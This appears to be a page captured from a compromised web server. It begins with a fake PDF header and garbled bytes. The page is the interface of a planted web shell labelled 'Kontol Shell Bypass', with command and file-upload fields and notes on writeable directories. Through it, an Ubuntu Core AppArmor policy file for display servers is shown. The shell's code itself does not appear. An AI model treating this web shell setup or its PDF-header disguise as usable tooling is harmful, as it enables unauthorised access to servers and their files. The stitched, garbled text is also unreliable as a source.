%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /snap/core/current/usr/share/apparmor/easyprof/policygroups/ubuntu-core/16.04/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : //snap/core/current/usr/share/apparmor/easyprof/policygroups/ubuntu-core/16.04/display-server
# Description: Can access the system as a display server. This is restricted
# because it gives access to the graphics and input systems.
# Usage: reserved

# Currently this is mir-specific. When have an X or wayland server, update
# accordingly.

# This shouldn't be needed, but is harmless
/usr/share/applications/ r,

# This is arguably via capabilities assignment...
# TODO: is this required?
/dev/tty* rw,

# This allows interacting with graphics hardware and therefore must be
# reserved.
capability sys_admin,
/dev/dri/** rw,
/sys/class/drm/ r,
/sys/class/drm/** r,
/sys/devices/**/drm/ r,
/sys/devices/**/drm/** r,

# This is arguably via capabilities assignment...
# This allows snooping input events and therefore must be reserved.
/dev/input/* rw,
/sys/class/input/ r,
/sys/class/input/** r,
/sys/devices/**/input/ r,
/sys/devices/**/input/** r,

# Socket to talk on
/run/mir_socket rw,

# TODO: investigate. tvoss claims it shouldn't be needed
# This allows access to all anonymous seqpacket addresses which breaks
# application isolation (therefore only privileged apps may use this cap)
unix (receive, send) type=seqpacket addr=none,

# For non-opengl apps
/dev/shm/\#* rw,

# udev
# FIXME: these are way too loose
/sys/devices/**/ r,
/run/udev/data/* r,
/sys/devices/**/uevent rw,

# FIXME: can this be fine-tuned at all?
capability sys_ptrace,
ptrace peer=**,

# TODO: investigate (what is this chowning to?)
capability chown,
capability fowner,

# TODO: investigate. These are usually the result of wrong directory
# permissions
capability dac_override,
capability dac_read_search,

# TODO: investigate
capability sys_tty_config,

# TODO: investigate
network netlink raw,

Kontol Shell Bypass